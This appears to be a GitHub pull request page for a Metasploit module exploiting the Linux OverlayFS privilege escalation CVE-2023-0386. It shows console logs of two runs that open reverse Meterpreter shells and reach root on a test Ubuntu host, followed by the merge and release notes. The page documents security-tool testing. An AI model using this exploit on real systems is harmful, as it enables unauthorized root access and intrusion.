[-] Msf::OptionValidateError One or more options failed to validate: SESSION.
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:6789 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.8y5eMuhgQ5/.JSfssf3V' (18040 bytes) ...
[*] Writing '/tmp/.8y5eMuhgQ5/.CDKPs' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.8y5eMuhgQ5
[*] Meterpreter session 2 opened (10.5.135.201:6789 -> 10.5.132.129:36534) at 2024-09-26 12:53:54 -0500


meterpreter > 
meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.129 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile True 
compile => True
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:6789 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.QjackZE5/.HlRLpjB' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.QjackZE5
[*] Meterpreter session 3 opened (10.5.135.201:6789 -> 10.5.132.129:36536) at 2024-09-26 12:55:17 -0500

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 3

Contributor

@bwatters-r7 bwatters-r7 left a comment

Great job; thank you so much for your time!

@bwatters-r7 bwatters-r7 merged commit dbc020a into rapid7:master Sep 26, 2024
36 checks passed
@bwatters-r7 bwatters-r7 added the rn-modules (release notes for new or majorly enhanced modules) and module labels Sep 26, 2024
@cdelafuente-r7
Contributor

Release Notes

This adds an exploit module that leverages a flaw in the Linux kernel’s OverlayFS subsystem, which allows unauthorized access to the execution of the setuid file with capabilities (CVE-2023-0386). This enables a local user to escalate their privileges on the system.

Successfully merging this pull request may close these issues.

Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
6 participants